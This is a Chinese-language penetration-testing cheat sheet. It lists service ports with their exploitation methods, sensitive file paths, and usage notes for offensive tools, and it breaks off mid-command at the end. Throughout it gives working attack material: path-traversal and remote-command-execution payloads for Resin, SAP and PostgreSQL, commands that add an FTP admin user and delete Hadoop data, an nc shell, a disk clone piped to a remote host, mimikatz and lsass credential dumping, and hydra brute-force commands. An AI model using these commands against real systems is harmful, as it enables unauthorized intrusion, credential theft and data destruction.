路径,端口,工具总结专题

一,常见端口总结

常见网络摄像头端口
一,远程管理端口

22 端口（SSH）
#安全攻击：弱口令、暴力猜解、用户名枚举利用方式：1、通过用户名枚举可以判断某个用户名是否存在于目标主机中，2、利用弱口令/暴力破解，获取目标主机权限。
23 端口（Telnet）
#安全漏洞：弱口令、明文传输利用方式：1、通过弱口令或暴力破解，获取目标主机权限。2、嗅探抓取 telnet明文账户密码。
3389 端口（RDP）
#安全漏洞：暴力破解利用方式：通过弱口令或暴力破解，获取目标主机权限。
5632 端口（Pcanywhere）
#安全漏洞：弱口令、暴力破解利用方式：通过弱口令或暴力破解，获取目标主机权限
5900 端口（VNC）
#安全漏洞：弱口令、暴力破解利用方式：通过弱口令或暴力破解，获取目标主机权限。
139端口(IPC)
net use  \\192.168.0.103\ipc$ "" /user:"administrator"
尝试空密码连接

139端口入侵
二,web组件端口

1234端口 (redis服务)
#如果开放了可以尝试使用/actuator/redis/info语句看是否能读取敏感信息，如：http://www.xxx.com:1234/actuator/redis/info
1090/1099 端口（RMI）
#安全漏洞：JAVA RMI 反序列化远程命令执行漏洞利用方式：使用nmap检测端口信息。端口信息：1099/1090    Java-rmi    Java RMI Registry检测工具：attackRMI.jar
7001 端口（Weblogic）
#安全漏洞：弱口令、SSRF、反序列化漏洞利用方式：1、控制台弱口令上传war木马2、SSRF内网探测3、反序列化远程代码执行等
8000 端口（jdwp）
#安全漏洞：JDWP 远程命令执行漏洞端口信息：      8000             jdwp           java #Debug Wire Protocol检测工具：https://github.com/IOActive/jdwp-shellifier
8080 端口（Tomcat）
#安全漏洞：弱口令、示例目录利用方式：通过弱口令登录控制台，上传war包。
8080 端口（Jboss）
#安全漏洞：未授权访问、反序列化。利用方式：1、未授权访问控制台，远程部署木马2、反序列化导致远程命令执行等。检测工具：https://github.com/joaomatosf/jexboss
8080 端口（Resin）
#安全漏洞：目录遍历、远程文件读取利用方式：通过目录遍历/远程文件读取获取敏感信息，为进一步攻击提供必要的信息。
#任意文件读取POC：payload1 = "/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd"payload2 = "/resin-doc/examples/jndi-appconfig/test?inputFile=../../../../../../../../../../etc/passwd"payload3 = "/ ..\\\\web-inf"
8080 端口（Jetty）
#安全漏洞：远程共享缓冲区泄漏利用方式：攻击者可以通过精心构造headers值来触发异常并偏移到共享缓冲区，其中包含了之前其他用户提交的请求，服务器会根据攻击者的payload返回特定位置的数据。检测工具：https://github.com/GDSSecurity/Jetleak-Testing-Script
8080 端口（GlassFish）
#安全漏洞：弱口令、任意文件读取利用方式：1、弱口令admin/admin，直接部署shell2、任意文件读取获取服务器敏感配置信息
8080 端口（Jenkins）
#安全漏洞：未授权访问 、远程代码执行利用方式：访问如下url，可以执行脚本命令，反弹shell，写入webshell等。http://<target>:8080/managehttp://<target>:8080/script
8161 端口（ActiveMQ）
#安全漏洞：弱口令、任意文件写入、反序列化利用方式：默认密码admin/admin登陆控制台、写入webshell、上传ssh key等方式。
*9043 端口（webSphere）*
#安全漏洞：控制台弱口令、远程代码执行后台地址：https://:9043/ibm/console/logon.jsp
****50000 端口 （SAP）******
#安全漏洞：远程代码执行利用方式：攻击者通过构造url请求，实现远程代码执行。POC:http://<target>:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe /c ipconfig /all
50070 端口（hadoop）
#安全漏洞：未授权访问利用方式：攻击者可以通过命令行操作多个目录下的数据，如进行删除操作。curl -i -X DELETE “http://ip:50070/webhdfs/v1/tmp?op=DELETE&recursive=true“curl -i -X PUT “http://ip:50070/webhdfs/v1/NODATA4U_SECUREYOURSHIT?op=MKDIRS“

三,数据库端口

389 端口（ldap）
#安全漏洞：未授权访问 、弱口令利用方式：通过LdapBrowser工具直接连入。
1433 端口（Mssql）
#安全漏洞：弱口令、暴力破解利用方式：差异备份getshell、SA账户提权等
1521 端口（Oracle）
#安全漏洞：弱口令、暴力破解利用方式：通过弱口令/暴力破解进行入侵。
3306 端口（MySQL）
#安全漏洞：弱口令、暴力破解利用方式：利用日志写入webshell、udf提权、mof提权等。
5432 端口（ PostgreSQL）
#安全漏洞：弱口令、高权限命令执行利用方式：攻击者通过弱口令获取账号信息，连入postgres中，可执行系统命令。。PoC参考：    DROP TABLE IF EXISTS cmd_exec;    CREATE TABLE cmd_exec(cmd_output text);    COPY cmd_exec FROM PROGRAM 'id';    SELECT * FROM cmd_exec;
5984 端口（CouchDB）
#安全漏洞：垂直权限绕过、任意命令执行利用方式：通过构造数据创建管理员用户，使用管理员用户登录，构造恶意请求触发任意命令执行。后台访问：http://<target>:5984/_utils
6379 端口（Redis）
#安全漏洞：未授权访问利用方式：绝对路径写webshell 、利用计划任务执行命令反弹shell、公私钥认证获取root权限、主从复制RCE等。
9200 端口（elasticsearch）
#安全漏洞：未授权访问、命令执行检测方式：1、直接访问如下url，获取相关敏感信息。  http://<target>:9200/_nodes  查看节点数据  http://<target>:9200/_river  查看数据库敏感信息2、通过构造特定的数据包，执行任意命令。
11211 端口（MemCache）
#安全漏洞：未授权访问检测方式：无需用户名密码，可以直接连接memcache 服务的11211端口。nc -vv <target> 11211
27017 端口（Mongodb）
#安全漏洞：未授权访问、弱口令利用方式：未授权访问/弱口令，远程连入数据库，导致敏感信息泄露。

四,协议端口

21 端口（FTP)
#安全漏洞：1、配置不当    2、明文传输    3、第三方软件提权利用方式：1、匿名登录或弱口令2、嗅探ftp用户名和密码3、Serv-U权限较大的账号可导致系统命令执行。FTP提权命令：  # 增加系统用户   Quote site exec net user 4567 4567 /add  # 提升到管理员权限   Quote site exec net localgroup administrators 4567 /add
25 端口（SMTP）
#攻击方式：1、匿名发送邮件 2、弱口令 3、SMTP用户枚举利用方式：1、SMTP服务器配置不当，攻击者可以使用任意用户发送邮件。2、SMTP弱口令扫描，获取用户账号密码，发送邮件钓鱼。3、通过SMTP用户枚举获取用户名：   nmap -p 25 -- smtp-enum-users.nse <target>
53 端口（DNS）
#安全攻击：1、DNS域传送漏洞、DNS欺骗、DNS缓存投毒检测方式：1、DNS域传送漏洞，Windows下检测使用nslookup命令，Linux下检测使用dig命令，通过执行命令可以清楚的看到域名解析情况。2、DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。3、DNS缓存投毒是攻击者欺骗DNS服务器相信伪造的DNS响应的真实性。
161 端口（SNMP）
#安全漏洞：默认团体名/弱口令访问利用方式：通过nmap自带的审计脚本进行检测，可能导致敏感信息泄露。。1、弱口令检测：nmap –sU –p161 –script=snmp-brute <target>2、获取系统信息：nmap –sU –p161 –script=snmp-sysdescr <target>3、获取用户信息：nmap -sU -p161 --script=snmp-win32-user <target>4、获取网络端口状态：nmap -sU -p161 --script=snmp-netstat <target>
443 端口（SSL）
#安全漏洞：OpenSSL 心脏出血利用方式：攻击者可以远程读取存在漏洞版本的openssl服务器内存中长大64K的数据。扫描脚本：nmap -sV --script=ssl-heartbleed <target>
445 端口（SMB）
#安全漏洞：信息泄露、远程代码执行利用方式：可利用共享获取敏感信息、缓冲区溢出导致远程代码执行，如ms17010。
873 端口（Rsync）
#安全漏洞：匿名访问、弱口令利用方式：攻击者可以执行下载/上传等操作，也可以尝试上传webshell。1、下载：#rsync -avz a.b.c.d::path/file path/filiname  2、上传：#rsync -avz path/filename a.b.c.d::path/file
2181 端口（Zookeeper）
#安全漏洞：未授权访问检测方式：攻击者可通过执行envi命令获得系统大量的敏感信息，包括系统名称、Java环境。 echo envi | nc ip port
2375 端口（Docker）
#安全漏洞：未授权方式检测方式：通过docker daemon api 执行docker命令。#列出容器信息，效果与docker ps -a 一致。 curl http:/

端口对应

二,常见文件路径总结

几个系统

Windows 系统

C:\boot.ini 查看系统版本
C:\windows\system32\inetsrv\MetaBase.xml IIS配置文件
C:\windows\repair\sam 存储Windows系统初次安装的密码
C:\Program Files\mysql\my.ini mysql配置
C:\Program Files\mysql\data\mysql\user.MYD mysql root
C:\windows\php.ini php.ini配置文件
c:/boot.ini //查看系统版本
c:/windows/php.ini //php配置信息
c:/windows/my.ini //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf\httpd.conf 或C:\apache\conf\httpd.conf //查看WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

Linux 系统

etc类通用目录
/etc/目录下常见是应用或者系统的配置文件

/root/.bash_hostiory 查看历史的命令 进而寻找文件类内容拿getshll
/etc/passwd 用户存放文件
/usr/local/app/apache2/conf/httpd.conf apache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf 虚拟网站设置
/usr/local/app/php5/lib/php.ini php相关设置
/etc/httpd/conf/httpd.conf apache
/etc/php5/apache2/php.ini ubuntu系统的默认路径
日志默认路径
/etc/httpd/logs/access_log 或者 /var/log/httpd/access_log apache+Linux 日志默认路径
D:\xampp\apache\logs\access.log
D:\xampp\apache\logs\error.log apache+win2003 日志默认路径
C:\WINDOWS\system32\Logfiles iis6.0+win2003 默认日志文件
%SystemDrive%\inetpub\logs\LogFiles iis7.0+win2003 默认日志文件
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本
/etc/issue
/etc/issue.net
#php session目录
/var/lib/php(5)/sessions/  (泄露session)
/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件

/etc/sysconfig/iptables 查看防火墙策略
load_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

proc目录
存储着进程动态运行的各种信息–>一个虚拟目录，有的时候如果配置文件读取不到路径可以试下用这个去读取路径

pid指向的是进程对应的可执行文件
/proc/[pid]/cmdline(pid指向进程所对应的终端命令)
/proc/[pid]/cwd/  (pid指向进程的运行目录)
/proc/[pid]/environ (pid指向进程运行时的环境变量)
/proc/self/exe
/proc/self/cmdline(程序运行的绝对路径)

Strutus2常用目录

WEB-WEB-INF/web.xml

APache常用目录

1)  /etc/httpd/conf/httpd.conf   (Apache的主配文件)
httpd.conf是Apache的主配文件，整个Apache也不过就是这个配置文件，里面几乎包含了所有的配置。有的distribution都将这个文件拆分成数个小文件分别管理不同的参数。但是主要配置文件还是以这个文件为主。只要找到这个文件名就知道如何设置了。后面会详细解释Apache主配文件的每一行配置
2) /etc/httpd/conf.d/*.conf  (  (include文件)
如果你不想要修改原始配置文件httpd.conf的话，那么可以将你自己的额外参数文件独立出来，注意以.conf结尾放在/etc/httpd/conf.d/目录下。重启Apache的时候，这个配置文件就会被读入主配文件之中了。他的好处就是当你在进行系统升级的时候，几乎不需要改动原本的配置文件，只要将你自己的额外参数文件复制到正确的地点即可，维护起来非常方便。
3) /etc/httpd/modules/
Apache支持很多的外挂模块，例如PHP以及SSL都是Apache外挂的一种。所有你想要使用的模块文件默认是放置在这个目录当中的。
4)  /var/www/html/  (  (网站根目录)
这个目录就是Apache默认的存放首页的目录（默认是index.html）
5)  /var/www/error/
当因为服务器设置错误，或是浏览器要求的数据错误时，在浏览器上出现的错误信息就以这个目录的默认信息为主
6) /var/www/icons/
这个目录提供Apache默认给予的一些小图示，可以随意使用。
7) /var/www/cgi-bin/
默认给一些可执行的CGI（网页程序）程序放置的目录。
8) /var/log/httpd/
默认的Apache日志文件都放在这里，对于流量比较大的网站来说，这个目录要格外注意，这里的数据文件可能会非常大。
9) /usr/sbin/apachectl
这个就是Apache的主要执行文件，这个执行文件其实就是一个Shell Script而已，他可以主动地侦测系统上面的一些设置值，好让你启动Apache时更简单一些。
10)  /usr/sbin/httpd
这个是主要的Apache二进制执行文件。
11)  /usr/bin/htpasswd  (  (Apache密码保护)
就当你想要登入某些网页时你需要输入帐号与密码，那Apache本身就提供一个最基本的密码保护方式，该密码的产生就是通过这个命令来实现的
/etc/apache2/apache2.conf 
/apache/conf/httpd.conf
appache的配置目录
结合select load_file('');文件进行代

Nginx目录

/usr/local/nginx/conf/*  (源代码安装或其他的一些系统)
/usr/log/* 日志文件
/usr/local/app/php5/lib/php.ini //PHP相关设置
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置

MYSQL

my.ini 配置文件-->配置相关的password等

MYSQL文件结构

宝塔路径

后台路径:/www/server/panel/data/admin_path.pl
登录账号：/www/server/panel/data/default.db(账号和加密的密码)
密码:/www/server/panel/default.pl(初始默认密码)

三,常见劫持

劫持类型总结：

hosts文件劫持
快捷方式文件劫持
网络运营商DNS劫持
IE工具栏
组策略
注册表
WMI脚本
各种驱动类劫持

四,常见工具

综合扫描工具

Nikto https://zhuanlan.zhihu.com/p/70225775
Xray  https://chaitin.github.io/xray/#/
W3af  https://www.freebuf.com/column/145984.html
Appscan https://zhuanlan.zhihu.com/p/28729371
AWVS扫描工具
burp扫描工具
goby
①添加web端口
80-89,442-443,1080,1214,5000-5010,5222,5900,5938,5984,6000-6010,6379,7000-7010,7070-7080
8000-8010,8080-8090,8222,8443,8545,8686,8888,9000-9100,9180,9200,9418,9999,10000,11115
②添加插件类

专题工具

①邮箱枚举工具

smtp-user-enum -M VRFY -U /root/Desktop/user.txt -t 192.168.1.107

-M: Method模式，选择VRFY, EXPN以及RCPT方法猜解用户名

-U: 用户名字典文件

-t: 运行smtp服务的主机

②分析文件工具

Metagoofil - 元数据收集工具

# 它可以自动在搜素引擎中检索和分析文件，还具有提供Mac地址，用户名列表等其他功能
$ python2 metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html

-d 指定目标域。
-t 来指定要metagoofil找到并下载文件类型。
-l 限制结果的搜索。缺省情况下，它被设置为200。
-n 指定要下载的文件的数量。
-o 指定一个目录来保存下载文件。
-f 输出文件的名称和位置

③压缩包文件爆破方法

利用kal中的filecrack工具进行爆破
或者windows中的Advanced ZIP Password Recovery工具进行爆破

ziperello
解密文件

④web指纹识别类

#常规扫描
whatweb 域名
#批量扫描
whatweb  -i  /root/target.txt  #即在放在文件中即可
#详细回显扫描
whatweb  -v  域名
#扫描强度等级控制
whatweb  -a  等级  域名      可以和-v参数结合使用
#如 whatweb -a 3 www.baidu.com
#快速本地扫描(扫描本地主机)
whatweb  --no-errors  -t 255  内网网段(10.96.10.0/24)
#将扫描结果导入到文件内
whatweb  www.baidu.com  --log-xml=baidu.xml   #将结果导入到baidu.xml文件中

⑤netcat瑞士军刀基本命令

①进行端口扫描
nc -nvz ip 地址 端口号
②nc -nv ip port
即列出过程
③进行传输文本信息

nc -nvlp 5555 即打开5555端口进行传输

④远程克隆硬盘
在远程电子取证时可以用，使用方法需要借助 dd 命令，首先通过 nc 监听一个端口，然后通过 dd 指定要克隆的分区，dd 的 of 参数相当于一个复制功能，然后再另一台机器通过 nc 连接此端口，dd 的 if 参数相当于粘贴的命令

nc -lp 6666 | dd of=/dev/sda
dd if=/dev/sda | nc -nv 192.168.228.128 6666 -q 1

⑤反向shell

#①先在服务器打开命令
nc -lp 6666 -c bash
#②在客户端反弹这个命令进行反弹回去
#客户端连接方法
nc 192.168.228.128 6666

⑥利用/usr/share/webshells/php/php-reverse-shell.php

#填写里面的shell.php代码
#-->然后利用nc -nvlp -ip进行连接即可

⑥netdiscover

扫描ip

netdiscover -r 目标IP

具体教程
具体2

⑦john工具

(破解密码)

#使用方法:
john [OPTIONS] [PASSWORD-FILES]
#如
john l
#l是保存密码的文件
#john [选项] [密码文件]

–single[=SECTION] ]“单裂”模式

–wordlist[=FILE] --stdin 单词表模式，从FILE或stdin读取单词

–pipe 像–stdin一样，但批量读取，并允许规则

–loopback[=FILE] 像 --wordlistg一样, 但是从.pot文件中获取单词

–dupe-suppression 压制wordlist中的所有模糊（并强制预加载）

–prince[=FILE] PRINCE模式，从FILE中读取单词

–encoding=NAME 输入编码（例如，UTF-8，ISO-8859-1）。 也可以看看doc / ENCODING和–list = hidden-options。

–rules[=SECTION] 为单词表模式启用单词修改规则

–incremental[=MODE] “增量”模式[使用部分模式]

–mask=MASK 掩码模式使用MASK

–markov[=OPTIONS] “马尔可夫”模式（参见doc / MARKOV）

–external=MODE 外部模式或字过滤器

–stdout[=LENGTH] 只是输出候选人密码[在LENGTH切]

–restore[=NAME] 恢复被中断的会话[名为NAME]

–session=NAME 给一个新的会话NAME

–status[=NAME] 打印会话的状态[名称]

–make-charset=FILE 制作一个字符集文件。 它将被覆盖

–show[=LEFT] 显示破解的密码[如果=左，然后uncracked]

–test[=TIME] 运行测试和每个TIME秒的基准

–users=[-]LOGIN|UID[,…] [不]只加载这个（这些）用户

–groups=[-]GID[,…] 只加载这个（这些）组的用户

–shells=[-]SHELL[,…] 用[out]这个（这些）shell来加载用户

–salts=[-]COUNT[:MAX] 用[out] COUNT [到MAX]散列加载盐

–save-memory=LEVEL 启用内存保存，级别1…3

–node=MIN[-MAX]/TOTAL 此节点的数量范围不在总计数中

–fork=N 叉N过程

–pot=NAME 锅文件使用

–list=WHAT 列表功能，请参阅–list = help或doc / OPTIONS

–format=NAME 强制使用NAME类型的散列。 支持的格式可以用–list=formats和–list=subformats来看

⑧nmap

nmap命令
①namp用于自己主机上的命令

nmap localhost #查看主机当前开放的端口
nmap -p 1024-65535 localhost #查看主机端口（1024-65535）中开放的端口

②nmap用于其他机器上的常用命令

#普通
nmap ip即完事
nmap -PS 192.168.21.163 #探测目标主机开放的端口
nmap -PS22,80,3306 192.168.21.163 #探测所列出的目标主机端口
nmap -O 192.168.21.163 #探测目标主机操作系统类型
nmap -A 192.168.21.163 #探测目标主机操作系统类型
nmap --help #更多nmap参数请查询帮助信息


nmap -sU 202.96.128.166 -p 53 -Pn 检查端口udp

nmap -sP 10.0.3.0/24 这个命令可以用于探测局域网有哪些机器

nmap 10.0.1.161 -sA （发送tcp的ack包进行探测，可以探测主机是否存活）
nmap -sS 10.0.1.161 使用频率最高的扫描选项：SYN扫描,又称为半开放扫描，它不打开一个完全的TCP连接，执行得很快，效率高 缺点：它需要root/administrator权限执行

典型命令
深度扫描器
python-nmap–>即python中使用nmap
安装

sudo apt-get install nmap python3-nmap

命令

import nmap
nm = nmap.PortScanner()#创建一个post扫描对象
nm.scan('127.0.0.1', '22-100')#扫描ip127.0.0.1的端口为22~100的机器
nm.command_line()#查看命令行
nm.scaninfo()#查看扫描信息
nm.all_hosts()#查看扫描主机的信息
nm['127.0.0.1'].hostname()
nm['127.0.0.1'].state()
nm['127.0.0.1'].all_protocols()
nm['127.0.0.1']['tcp'].keys()

⑨xray专题

①基础检测
1.基础扫描一个站点

./xray webscan --basic-crawler http://example.com/

2.指定扫描输出
不指定输出时，默认输出到控制台的标准输出中，可以做管道处理，也可以选择输出为文件，如：

./xray webscan --url http://example.com/ --json-output report.json

不同参数对应不同的输出方式：

无参数：输出到控制台的标准输出
--`webhook-output`：输出到文本文件中
--`json-output`：输出到 JSON 文件中
--`html-output`：输出到 HTML 文件中

3.基于代理的被动扫描
xray 可以通过类似 Burp 的方式启动，利用 HTTP 代理来抓包扫描，如：

./xray webscan --listen 127.0.0.1:7777

②进阶检测
1.指定扫描插件
如指定扫描注入的

./xray webscan --plugins cmd_injection --url http://example.com/  -json-output report.json
#或者是text格式的
-webhook-output report.txt
#或者html格式的
-html-output report.html

指定扫描xss的

./xray webscan --plugins xss --url http://example.com/

SQL 注入检测 (key: sqldet)：支持报错注入、布尔注入和时间盲注等
XSS 检测（key: xss）：支持扫描反射型、存储型 XSS
命令/代码注入检测 (key: cmd_injection)：支持 shell 命令注入、PHP 代码执行、模板注入等
目录枚举 (key: dirscan)：检测备份文件、临时文件、debug 页面、配置文件等10余类敏感路径和文件
路径穿越检测 (key: path_traversal)：支持常见平台和编码
XML 实体注入检测 (key: xxe)：支持有回显和反连平台检测
POC 管理 (key: phantasm)：默认内置部分常用的 POC，用户可以根据需要自行构建 POC 并运行。可参考：POC 编写文档（https://chaitin.github.io/xray/#/guide/poc）
文件上传检测 (key: upload)：支持检测常见的后端服务器语言的上传漏洞
弱口令检测 (key: brute_force)：支持检测 HTTP 基础认证和简易表单弱口令，内置常见用户名和密码字典
JSONP 检测 (key: jsonp)：检测包含敏感信息可以被跨域读取的 jsonp 接口
SSRF 检测 (key: ssrf)：ssrf 检测模块，支持常见的绕过技术和反连平台检测
基线检查 (key: baseline)：检测低 SSL 版本、缺失的或错误添加的 http 头等
任意跳转检测 (key: redirect)：支持 HTML meta 跳转、30x 跳转等
CRLF 注入 (key: crlf_injection)：检测 HTTP 头注入，支持 query、body 等位置的参数

2.只扫描一个 URL
xray 还提供了方便的只扫描一个 URL 的方式，如：

./xray webscan --url http://example.com/ --json-output out.json

3.自定义poc方式进行扫描
①修改poc内容
如更改为

name: poc-yaml-tomcat_put
rules:
- method: PUT
path: /hello.jsp
body: world
- method: GET
path: /hello.jsp
search: world

②进行调用poc进行使用

./xray webscan --plugins phantasm --poc /home/test/poc.yaml --url http://example.com/

学习

⑩wireshark专题

①过滤规则

1.协议过滤--> 即只显示TCP类型的协议
TCP：只显示TCP协议的数据流
HTTP：只显示HTTP协议的数据流
ICMP：只显示ICMP协议的数据流
ARP：只显示ARP协议的数据流
DNS：显示DNS协议的数据流

2.IP过滤-->
ip.addr = 192.168.116.138#只显示ip为192.168.116.138有关的数据流
ip.src==ip#即只显示源地址为IP的内容
ip.dst==ip#显示目标地址为该IP的内容
3.端口过滤-->
tcp.port==80
#显示端口为80的
tcp.srcport==80
#显示TCP协议源端口为80的
4.Http模式过滤
http.request.method=="GET" #只显示HTTP GET方法的。
http.request.method=="POST" #显示POST请求
http.request.url contains admin #显示url中包含admin的 请求
http.request.code==404 #显示状态码为404
http.request.uri==”/login.php”#请求的URI为/login.php语法
http contains “sqlmap”#请求的http中包含sqlmap的语法
http.request.method==”GET” && http contain “User-Agent”#请求方式为GET且请求中包含UA信息
5.利用and/or进行控制封包的

②封包详细信息段
5个信息段代表含义
Frame: 物理层的数据帧概况
Ethernet II: 数据链路层以太网帧头部信息
Internet Protocol Version 4: 互联网层IP包头部信息
Transmission Control Protocol: 传输层T的数据段头部信息，此处是TCP
Hypertext Transfer Protocol: 应用层的信息，此处是HTTP协议

信息段对应层次

③典型需要注意需要分析的内容
–>
tcp字节通信协议–>三次握手包
icmp报文信息
返回值对应参数

④xmind思维导图基础知识

然后进行专题导出 导出相关的数据流
专题进行过滤

十一 webscan

常用命令

--update  更新到最新版本
--url   | -u <target url>  #要扫描的`WordPress`站点.
--force | -f   #不检查网站运行的是不是`WordPress`
--enumerate | -e [option(s)]  #枚举

利用

扫描漏洞

wpscan -url http://www.xxxxx.top/	

扫描用户

wpscan --url http://www.xxxxx.top/ --enumerate u

扫描主题

wpscan --url http://www.xxxxx.top/ --enumerate t

扫描主题中漏洞

wpscan --url http://www.xxxxx.top/ --enumerate vt

扫描插件中漏洞

wpscan --url http://www.xxxxx.top/ --enumerate vp

暴力攻击

wpscan --url https://www.xxxxx.top/ -e u --wordlist /root/桌面/password.txt

爆破账号密码

wpscan–url http://dc-2/ -U 2.txt -P 1.txt
#即指定账号-U是2.txt
#密码-P 指定的是1.txt
#实现爆破出账号

十二 cewl+john组合拳

John
运用方法

john 1
#在这里1指的是文件,即将密文放在1这个文件夹中

cewl
介绍：基于linux的一种密码字典生成工具

#命令模式
cewl <url> [options]

1.基础命令模式

-h, –help：显示帮助。
-k, –keep：保存下载文件。
-d , –depth ：爬行深度，默认2。
-m, –min_world_length：最小长度，默认最小长度为3。
-o, –offsite：允许爬虫访问其他站点。
-w, –write：将输出结果写入到文件。
-u, –ua ：设置user agent。
-n, –no-words：不输出字典。
–with-numbers：允许单词中存在数字，跟字母一样。
-a, –meta：包括元数据
–meta_file file：输出元数据文件。
-e, –email：包括email地址。
–email_file ：输入邮件地址文件。
–meta-temp-dir 《dir》
exiftool解析文件时使用的临时目录，默认是/temp。
-c, –count：显示发现的每个单词的数量。
-v, –verbose：verbose
–debug:提取调试信息。

2.认证

–auth_type：Digest或者basic认证。
–auth_user：用户名认证。
–auth_pass：密码认证。

3.代理

–proxy_host：代理主机。
–proxy_port：代理端口，默认8080。
–proxy_username：用户名代理。
–proxy_password：密码代理。

常用命令状况特点

#爬取默认深度且将信息写入文件中
cewl http://www.ignitetechnologies.in/ -w dict.txt
#生成指定长度为9的字典
cewl http://www.ignitetechnologies.in/ -m 9
#从网站获取email地址(n参数是指指定爬取网站隐藏的单词列表)
cewl http://www.ignitetechnologies.in/ -n -e
#增加爬行深度
cewl http://www.ignitetechnologies.in/ -d 3
#代理服务器状况操作方法
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/

十三 mimikatz使用

mimikatz

常规命令

1.常规的操作使用命令

mimikatz # cls         –>清屏,类似dos命令cls.

mimikatz # exit       –>退出mimikatz.

mimikatz #version  –>查看当前的mimikatz的版本.

随便输入”xxx::”，会提示”modules:’xxx’ intr0uvable”,大概意思就是你输入的命令不存在，然后会列出所有可用的命令



查看列表中命令的具体参数同样可以输入”命令::”来查看，比如:”inject::”,如图：



可以看到命令inject的具体参数有pid,process,service等……

2.系统方面的操作使用命令:system

mimikatz #system::user  –>查看当前登录的系统用户

mimikazt #system::computer –>返回当前的计算机名称

3.在服务器终端的操作命令: ts

mimikatz #ts::sessions  –>显示当前的会话

mimikatz #ts::processes windows-d.vm.nirvana.local   –>显示服务器的进程和对应的pid情况等。

4.系统服务相关的操作使用命令:service

5.系统进程相关操作的使用命令:process

6.系统线程相关操作使用命令:thread

7.系统句柄相关操作使用命令:handle

8.加密相关操作使用命令:crypto

9.注入操作使用命令:inject

## 实际运用

#抓取密码命令-->适用于win10之前的版本系统（典型win10系统抓取不到密码明文）
privilege::debug
sekurlsa::logonpasswords

渗透环境运用类

①将密码的文件导出到本地,适用于mimikatz不免杀的情况下
Procdump.exe -accepteula -ma lsass.exe lsass.dmp

②mimikatz进行抓取

sekurlsa::minidump c:\users\test\appdata\local\temp\lsass.dmp
sekurlsa::logonpasswords

渗透中利用

mimikatz+winrar利用
步骤利用
①上传winrar.exe +mimikatz
②解压winrar.exe e x64.rar

③运行mimi.bat

mimi.bat内容
mimikatz.exe  ""privilege::debug"" ""log"" ""sekurlsa::logonpasswords"" exit

④将生成的mimikatz.log复制到网站根目录下,然后去查看

附

#winrar压缩命令
#压缩盘的dat文件夹
winrar.exe a -ag -k -r -s -ibck c:/bak.rar c:/dat/
#压缩文件
winrar a -ag -ibck bak.rar filename1 filename2 filename....

#参数说明： 
a :备份所有文件； -ag :当创建压缩文件时，以格式“YYYYMMDDHHMMSS”附加当前日期字符串,文件名bakYYYYMMDDHHMMSS.rar； -k :锁定压缩文件； -r:备份目录和子目录； -s :创建固实压缩文件； -ibck:后台运行；

filename1：要压缩的文件名，可以多个，也可用通配符file*

十四 hydra

hydra神器
基本参数用法

参数 说明 
-R 继续从上一次进度接着破解 
-S 大写，采用SSL链接 
-s [PORT] 小写，可通过这个参数指定非默认端口 
-l [LOGIN] 指定破解的用户，对特定用户破解 
-L [FILE] 指定用户名字典 
-p [PASS] 小写，指定密码破解，少用，一般是采用密码字典 
-P [FILE] 大写，指定密码字典 
-e [ns] 可选选项，n:空密码试探，s:使用指定用户和密码试探 
-C [FILE] 使用冒号分割格式，例如"登录名:密码"来代替-L/-P参数 
-M [;FILE] 指定目标列表文件一行一条 
-o [FILE] 指定结果输出文件 
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解 
-t [TASKS] 同时运行的线程数，默认为16 
-w [TIME] 设置最大超时的时间，单位秒，默认是30s 
-v/-V 显示详细过程 
server 指定服务名,支持的服务和协议:telnet ftp pop3 http[s]-{head/get} http-{get/post}等等 

如实际应用–>13个破解
破解web层
1.)破解web登录

Hydra -L <用来爆破的用户名列表> -p<用来爆破的密码列表> <IP地址> <表单的参数> <登录失败的消息>
Hydra -L <wordlist> -p<passlist> 
114.115.144.164 http-post-form"/login.php: #即利用burp抓包到的参数
username=^USER&password=^PASS&Login=Login:Login failed"

2.)破解ssh登录

hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh
#即最后改ip和密码账号字典即可

3.)破解telnet

#用不了了,不知道为什么-->即无法使用-L类型
hydra 192.168.1.104 telnet -L user.txt -P pass.txt -t 32 -s 23 -e ns -f -V
#下面的可用
hydra  -l root
